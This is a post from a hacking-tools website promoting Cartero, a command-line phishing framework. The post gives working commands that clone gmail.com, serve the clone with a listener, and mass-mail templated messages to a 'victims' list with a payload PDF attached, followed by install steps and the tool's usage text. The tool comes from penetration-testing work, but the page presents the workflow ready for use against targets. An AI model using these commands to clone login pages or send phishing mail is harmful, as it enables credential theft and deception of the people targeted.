• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2017
  • November
  • 3
  • Cartero – Social Engineering Framework

Cartero – Social Engineering Framework

November 3, 2017November 18, 2017 Comments Off on Cartero – Social Engineering Framework
cartero cartero social engineering framework download cartero how to use cartero

A robust Phishing Framework with a full featured CLI interface. The project was born out necessity through of years of engagements with tools that just didn’t do the job. Even though there are many projects out there, we were not able to find a suitable solution that gave us both easy of use and customizability.

Cartero is a modular project divided into commands that perform independent tasks (i.e. Mailer, Cloner, Listener, AdminConsole, etc…). In addition each sub-command has repeatable configuration options to configure and automate your work.

For example, if we wanted to clone gmail.com, we simply have to perform the following commands.

./cartero Cloner --url https://gmail.com --path /tmp --webserver gmail_com
./cartero Listener --webserver /tmp/gmail_com -p 80
Launching mongodb
Puma starting in single mode...
* Version 2.8.2 (ruby 2.1.1-p76), codename: Sir Edmund Percival Hillary
* Min threads: 4, max threads: 16
* Environment: production
* Listening on tcp://0.0.0.0:80
Use Ctrl-C to stop

Once we have a site up and running we can simply use the Mailer command to send templated emails to our victims:

./cartero Mailer --data victims.json --server gmail_com --subject "Internal Memo" --htmlbody email_html.html --attachment payload.pdf --from "John Doe <[email protected]>"
Sending [email protected]
Sending [email protected]
Sending [email protected]

 

Installation


Automated Installation

Using brew 2.1.5 ruby as default ruby library

curl -L https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh | bash

 

Dependencies:

Ruby, Mongodb

 

Framework

git clone https://github.com/section9labs/Cartero
cd Cartero
gem install bundle
bundle install
cd bin

 

Usage


Commands

Cartero is a very powerful easy to use CLI.

./cartero
Usage: cartero [options]

List of Commands:
    AdminConsole, AdminWeb, Mailer, Cloner, Listener, Servers, Templates

Global options:
        --proxy [HOST:PORT]          Sets TCPSocket Proxy server
    -c, --config [CONFIG_FILE]       Provide a different cartero config file
    -v, --[no-]verbose               Run verbosely
    -p [PORT_1,PORT_2,..,PORT_N],    Global Flag fo Mailer and Webserver ports
        --ports
    -m, --mongodb [HOST:PORT]        Global Flag fo Mailer and Webserver ports
    -d, --debug                      Sets debug flag on/off
        --editor [EDITOR]            Edit Server


Common options:
    -h, --help [COMMAND]             Show this message
        --list-commands              Prints list of commands for bash completion
        --version                    Shows cartero CLI version

 

Social Engineering Framework: Cartero Download

Post navigation

EvilURL – An unicode domain phishing generator for IDN Homograph Attack
Trape – People tracker on the Internet

Related Articles

Zmap - A Fast Single Packet Network Scanner Designed For Internet-wide Network Surveys

Zmap – A Fast Single Packet Network Scanner Designed For Internet-wide Network Surveys

- Hack Tools
January 23, 2021
ipscan

Angry IP Scanner v3.7.4 releases: fast and friendly network scanner

- Hack Tools
January 23, 2021
Sigurlx - A Web Application Attack Surface Mapping Tool

Sigurlx – A Web Application Attack Surface Mapping Tool

- Hack Tools
January 23, 2021
hacker gadgets
hacker phone covers

Recent Posts

Zmap - A Fast Single Packet Network Scanner Designed For Internet-wide Network Surveys

Zmap – A Fast Single Packet Network Scanner Designed For Internet-wide Network Surveys

January 23, 2021
VLC 3.0.12 fixes multiple security vulnerabilities

VLC 3.0.12 fixes multiple security vulnerabilities

January 23, 2021
ipscan

Angry IP Scanner v3.7.4 releases: fast and friendly network scanner

January 23, 2021
Sigurlx - A Web Application Attack Surface Mapping Tool

Sigurlx – A Web Application Attack Surface Mapping Tool

January 23, 2021
CSSG: Cobalt Strike Shellcode Generator

CSSG: Cobalt Strike Shellcode Generator

January 22, 2021
DNSpooq Security Vulnerabilities Alert

DNSpooq Security Vulnerabilities Alert

January 22, 2021

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs
ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook
Twitter
Google-plus
Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW